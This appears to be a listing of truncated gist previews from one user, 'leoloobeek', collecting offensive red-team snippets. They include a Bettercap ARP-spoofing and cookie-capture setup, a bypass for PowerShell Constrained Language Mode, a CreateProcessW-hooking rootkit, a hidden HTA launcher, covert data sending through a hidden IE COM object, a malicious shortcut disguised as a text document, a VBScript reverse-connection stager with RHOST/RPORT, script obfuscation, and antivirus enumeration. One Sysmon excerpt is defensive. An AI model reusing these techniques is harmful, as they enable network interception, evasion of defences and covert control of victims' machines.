leoloobeek

// Code mashed together from here: https://github.com/bettercap/caplets/
// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
//
// net.probe on
// sleep 1
// net.probe off
// set arp.spoof.targets <TARGETS>
// set https.proxy.script /root/caplets/responder-n-cookies.js
// set http.proxy.script /root/caplets/responder-n-cookies.js
// https.proxy on

leoloobeek

function Remove-ConstrainedLanguageMode {
<#
.Synopsis
Set language mode for a powershell session to 'full'.

.Description
Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' 
and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values.

.Example

leoloobeek

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

leoloobeek

	<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS-->
		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus-->
		<ImageLoad onmatch="include">
			<ImageLoaded condition="end with">ieproxy.dll</ImageLoaded>
		</ImageLoad>
		<ImageLoad onmatch="exclude">
			<Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image>
			<Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image>
			<Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image>
			<Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image>

leoloobeek

<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try
{

leoloobeek

// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

leoloobeek

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()

leoloobeek

Call X()
End Function

Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"

Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)

leoloobeek

Option Explicit 
 
dim oEncoder, oFilesToEncode, file, sDest 
dim sFileOut, oFile, oEncFile, oFSO, i 
dim oStream, sSourceFile 
 
set oFilesToEncode = WScript.Arguments 
set oEncoder = CreateObject("Scripting.Encoder") 
For i = 0 to oFilesToEncode.Count - 1 
    set oFSO = CreateObject("Scripting.FileSystemObject") 

leoloobeek

Function Base64Encode(sText)
  dim DM, EL
  Set DM = CreateObject("Microsoft.XMLDOM")
  Set EL = DM.createElement("tmp")
  EL.DataType = "bin.base64"
  EL.NodeTypedValue = sText
  Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")